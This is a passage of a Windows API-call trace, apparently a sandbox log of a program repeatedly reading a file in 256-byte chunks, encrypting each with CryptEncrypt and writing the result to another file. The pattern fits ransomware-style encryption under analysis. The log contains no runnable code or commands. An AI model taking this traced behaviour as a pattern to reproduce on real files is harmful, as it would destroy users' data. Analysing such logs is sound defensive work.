lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.881] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.881] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.881] GetLastError () returned 0x0 [0166.881] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.881] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.881] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.881] GetLastError () returned 0x0 [0166.881] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.881] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.881] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.881] GetLastError () returned 0x0 [0166.881] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.881] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.881] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.881] GetLastError () returned 0x0 [0166.881] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.881] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.881] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.881] GetLastError () returned 0x0 [0166.881] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.881] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.881] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.881] GetLastError () returned 0x0 [0166.881] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.881] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.882] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.882] GetLastError () returned 0x0 [0166.882] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.882] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.882] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.882] GetLastError () returned 0x0 [0166.882] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.882] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.882] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.882] GetLastError () returned 0x0 [0166.882] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.882] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.882] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.882] GetLastError () returned 0x0 [0166.882] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.882] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.882] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.882] GetLastError () returned 0x0 [0166.882] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.882] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.882] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.882] GetLastError () returned 0x0 [0166.882] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.882] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.883] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.883] GetLastError () returned 0x0 [0166.883] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.883] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.883] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.883] GetLastError () returned 0x0 [0166.883] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.883] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.883] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.883] GetLastError () returned 0x0 [0166.883] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.883] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.883] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.883] GetLastError () returned 0x0 [0166.883] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.883] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.883] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.883] GetLastError () returned 0x0 [0166.883] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.883] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.883] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.883] GetLastError () returned 0x0 [0166.883] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.883] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.883] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.883] GetLastError () returned 0x0 [0166.884] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.884] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.884] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.884] GetLastError () returned 0x0 [0166.884] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.884] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.884] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.884] GetLastError () returned 0x0 [0166.884] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.884] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.884] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.884] GetLastError () returned 0x0 [0166.884] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.884] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.884] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.884] GetLastError () returned 0x0 [0166.884] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.884] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.884] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.884] GetLastError () returned 0x0 [0166.884] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.884] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.884] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.884] GetLastError () returned 0x0 [0166.884] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.884] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.885] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.885] GetLastError () returned 0x0 [0166.885] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.885] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.885] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.885] GetLastError () returned 0x0 [0166.885] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.885] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.885] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.885] GetLastError () returned 0x0 [0166.885] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.885] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.885] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.885] GetLastError () returned 0x0 [0166.885] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.885] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.885] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.885] GetLastError () returned 0x0 [0166.885] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.885] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.885] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.885] GetLastError () returned 0x0 [0166.885] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.885] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.886] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.886] GetLastError () returned 0x0 [0166.886] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, 